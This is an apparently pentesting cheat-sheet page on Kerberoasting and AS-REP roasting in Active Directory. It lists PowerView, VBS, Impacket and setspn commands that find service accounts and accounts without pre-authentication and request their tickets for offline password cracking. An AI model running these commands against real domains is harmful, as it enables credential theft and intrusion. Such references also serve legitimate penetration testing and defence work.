Roasting
Finding Kerberoastable usersβ
tip
If the SPN requested is registered for a user account rather than a computer account, the userβs password is used to encrypt the service ticket.
Powerview
Get-DomainUser -SPN -Properties distinguishedname,serviceprincipalname [-Domain FOREIGN]
VBS
cscript.exe GetUserSPNs.vbs
Impacket GetUserSPNs.ps1
GetUserSPNs.py <domain_name>/<username>:<password> -dc-ip <dc_ip> -request
Manually
info
This will produce a huge output and will need manually triage (check for USER accounts).
setspn -T <DOMAIN> -F -Q */*
ASREP Roastingβ
tip
AS-REP requests a TGT but not a TGS. Kerberos pre authentication does not need to be enable.
PowerView
Get-DomainUser -PreauthNoRequired -Properties distinguishedname